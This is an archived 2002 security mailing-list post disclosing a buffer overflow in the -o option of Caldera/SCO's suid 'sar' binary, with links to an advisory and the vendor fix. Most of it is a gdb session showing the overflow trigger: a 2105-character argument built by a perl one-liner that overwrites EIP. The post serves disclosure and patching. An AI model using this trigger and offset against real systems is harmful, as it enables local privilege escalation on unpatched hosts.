OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: KF (dotslashsnosoft.com)
Date: Thu May 09 2002 - 04:29:43 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Caldera recently released an update for the suid sar binary. At one point in time someone pointed out that sar -f had an overflow (Brok Tellier or k2 probably I can't remember). The -f overflow was fixed but the -o option (which I have seen in private security advisorys floating around) also had an overflow but I don't think anyone ever told Caldera / SCO. I haven't gotten around to finishing up the exploit but here are the details for those of you that are interested.

    Sec focus bid: http://online.securityfocus.com/advisories/4089
    Caldera fix: ftp://stage.caldera.com/pub/security/openserver/CSSA-2002-SCO.17

    Exploit details:

    Starting program: //home/kevin//./sar -o `perl -e 'print "A" x 2104'`
    //home/kevin//./sar: Cannot create file
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    ...
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.l

    Program exited with code 01.

    Try again with one more char.

    (gdb) r -o `perl -e 'print "A" x 2105'`
    Starting program: //home/kevin//./sar -o `perl -e 'print "A" x 2105'`

    Program received signal SIGSEGV, Segmentation fault.
    0x80021c2d in getenv ()
    (gdb) bt
    #0 0x80021c2d in getenv ()
    #1 0x8001f2da in _tz_info ()
    #2 0x8004e5c2 in tzset ()
    #3 0x8004e4ba in _localtime_r ()
    #4 0x8001db5f in localtime ()
    #5 0x804a124 in memset ()
    #6 0x41414141 in ?? ()
    Cannot access memory at address 0x41414141.
    (gdb) frame 6
    #6 0x41414141 in ?? ()
    (gdb) i r
    eax 0x8001db20 -2147362016
    ecx 0x54 84
    edx 0x804765c 134510172
    ebx 0x0 0
    esp 0x80463d4 0x80463d4
    ebp 0x41414141 0x41414141
    esi 0x804764c 134510156
    edi 0x0 0
    eip 0x41414141 0x41414141
    ps 0x10206 66054
    cs 0x17 23
    ss 0x1f 31
    ds 0x1f 31
    es 0x1f 31
    fs 0x0 0
    gs 0x0 0

    -KF